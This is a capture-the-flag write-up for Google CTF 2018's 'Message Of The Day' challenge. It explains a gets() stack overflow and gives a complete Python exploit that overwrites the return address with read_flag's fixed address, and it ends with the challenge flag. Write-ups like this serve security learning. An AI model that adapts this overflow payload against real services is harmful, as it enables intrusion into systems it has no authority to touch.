Google CTF 2018
Message Of The Day
From the OffHub router, you jump onto the Google-Haus smart hub. This fully featured assistant of the future, which uses machine learning on the blockchain to control all our IoT devices, promises it all. What it actually delivers is the ability to print a Message-of-the-day; the rest is available as a premium subscription service, paid monthly.
$nc motd.ctfcompetition.com 1337
You can find all my CTF solutions here.
The attachment (the `motd` binary) and the server connection info are given above. I opened the motd binary in IDA.
In main, input is read with getline(), which is bounds-safe. To find a stack buffer overflow we need an unbounded read such as gets(), and luckily there is one in the set_motd function. Its stack buffer is 0x100 = 256 bytes (bytes, not bits), so writing past it (256 bytes of buffer plus the 8-byte saved rbp) overwrites the saved return address and lets us redirect execution to an address of our choosing.
Next we need somewhere useful to return to. Looking for the flag, I found the get_admin_motd function, which calls a read_flag function.
read_flag opens ./flag.txt, which is presumably the flag file, so returning directly into it should print the flag. I noted its address and built a payload that overwrites the return address with it (no brute force is needed: the address is fixed).
The address of read_flag is 0x00000000606063A5. The exploit relies on this being a fixed address, i.e. on the binary not being position-independent (PIE); confirm this with `checksec` on your copy before hard-coding it.
I used gynvael's exploit template script, filling in the payload in go():
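#!/usr/bin/python
"""Exploit for Google CTF 2018 "Message Of The Day" (ret2read_flag).

Menu option 2 ("set a new motd") reads the message with gets() into a
0x100-byte stack buffer.  A 264-byte filler (buffer + saved rbp) followed by
the address of read_flag() overwrites the saved return address, so set_motd()
returns straight into read_flag() and the server prints ./flag.txt.

The socket/packing helpers are gynvael's exploit template; the challenge
specific part is build_payload() and go().  All I/O is done in bytes so the
script runs on both Python 2 and Python 3.
"""
import random
import sys
import socket
try:
    import telnetlib  # deprecated (PEP 594) and removed in Python 3.13
except ImportError:  # pragma: no cover - _interact() falls back to a dumper
    telnetlib = None
import os
import time
import threading
from struct import pack, unpack
from time import time  # NOTE: shadows the `time` module above; unused here

HOST = 'motd.ctfcompetition.com'
PORT = 1337

# Address of read_flag() as seen in IDA.  Usable as a fixed return target only
# because the binary is loaded at a fixed base (no PIE) - re-check with
# `checksec` on your copy of the binary.
READ_FLAG_ADDR = 0x00606063A5

# gets() destination buffer in set_motd() is 0x100 bytes; 8 more bytes cover
# the saved rbp that sits between the buffer and the return address.
BUF_LEN = 0x100


def recvuntil(sock, txt):
    """Read from *sock* one byte at a time until *txt* (bytes) has been seen.

    Returns a (status, data) tuple where status is "OK", "DISCONNECTED",
    "TIMEOUT" or "ERROR" and data is everything received so far (on "OK" it
    ends with *txt*).
    """
    d = b""
    while d.find(txt) == -1:
        try:
            dnow = sock.recv(1)
            if len(dnow) == 0:
                return ("DISCONNECTED", d)
        except socket.timeout:
            return ("TIMEOUT", d)
        except socket.error:
            return ("ERROR", d)
        d += dnow
    return ("OK", d)


def recvall(sock, n):
    """Read exactly *n* bytes from *sock*.

    Returns (status, data) like recvuntil(); on "OK" len(data) == n, otherwise
    data holds whatever partial payload arrived before the failure.
    """
    d = b""
    while len(d) != n:
        try:
            dnow = sock.recv(n - len(d))
            if len(dnow) == 0:
                return ("DISCONNECTED", d)
        except socket.timeout:
            return ("TIMEOUT", d)
        except socket.error:
            return ("ERROR", d)
        d += dnow
    return ("OK", d)


# Proxy object for sockets.
class gsocket(object):
    """Thin socket wrapper adding recvall()/recvuntil() that return False on
    any failure instead of a (status, data) tuple.  Every other attribute is
    forwarded to the underlying socket.socket.
    """

    def __init__(self, *p):
        self._sock = socket.socket(*p)

    def __getattr__(self, name):
        return getattr(self._sock, name)

    def recvall(self, n):
        """Exactly *n* bytes, or False on disconnect/timeout/error."""
        err, ret = recvall(self._sock, n)
        # BUG FIX: the template compared against an undefined name `OK`,
        # which raised NameError on the first call.
        if err != "OK":
            return False
        return ret

    def recvuntil(self, txt):
        """Everything up to and including *txt*, or False on failure."""
        err, ret = recvuntil(self._sock, txt)
        if err != "OK":
            return False
        return ret


# Base for any of my ROPs: little-endian pack/unpack of 8/16/32/64-bit ints.
def db(v):
    return pack("<B", v)


def dw(v):
    return pack("<H", v)


def dd(v):
    return pack("<I", v)


def dq(v):
    return pack("<Q", v)


def rb(v):
    # v[:1] (not v[0]) so a bytes object is passed on Python 3, where
    # indexing would yield an int that unpack() rejects.
    return unpack("<B", v[:1])[0]


def rw(v):
    return unpack("<H", v[:2])[0]


def rd(v):
    return unpack("<I", v[:4])[0]


def rq(v):
    return unpack("<Q", v[:8])[0]


def build_payload(ret_addr=READ_FLAG_ADDR, buf_len=BUF_LEN, fill=b"A"):
    """Return the overflow payload for set_motd().

    Layout: `fill` * (buf_len + 8) to cover the gets() buffer and the saved
    rbp, then the 64-bit little-endian return target.  Parameters are exposed
    so the same builder works for other offsets/targets.
    """
    return fill * (buf_len + 8) + dq(ret_addr)


def _interact(s):
    """Hand *s* over to the user so the flag (and any prompt) is visible."""
    if telnetlib is not None:
        t = telnetlib.Telnet()
        t.sock = s
        t.interact()
        return
    # telnetlib is gone on 3.13+: relay what the server sends until it closes,
    # which is enough to see the flag printed by read_flag().
    out = getattr(sys.stdout, "buffer", sys.stdout)
    while True:
        chunk = s.recv(4096)
        if not chunk:
            break
        out.write(chunk)
        out.flush()


def go(host=None, port=None):
    """Connect to the service, send the overflow and go interactive.

    host/port default to the module-level HOST/PORT.  The socket is always
    closed, even if the interactive session raises.
    """
    host = HOST if host is None else host
    port = PORT if port is None else port
    s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    try:
        # Menu option 2 = set a new MOTD; the server reads it with gets().
        s.sendall(b"2\n")
        s.sendall(build_payload() + b"\n")
        # NOTE(review): if the jump into read_flag() crashes instead of
        # printing, stack alignment before the call is the usual suspect.
        _interact(s)
    finally:
        s.close()


if __name__ == "__main__":
    go()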
CTF{m07d_1s_r3t_2_r34d_fl4g}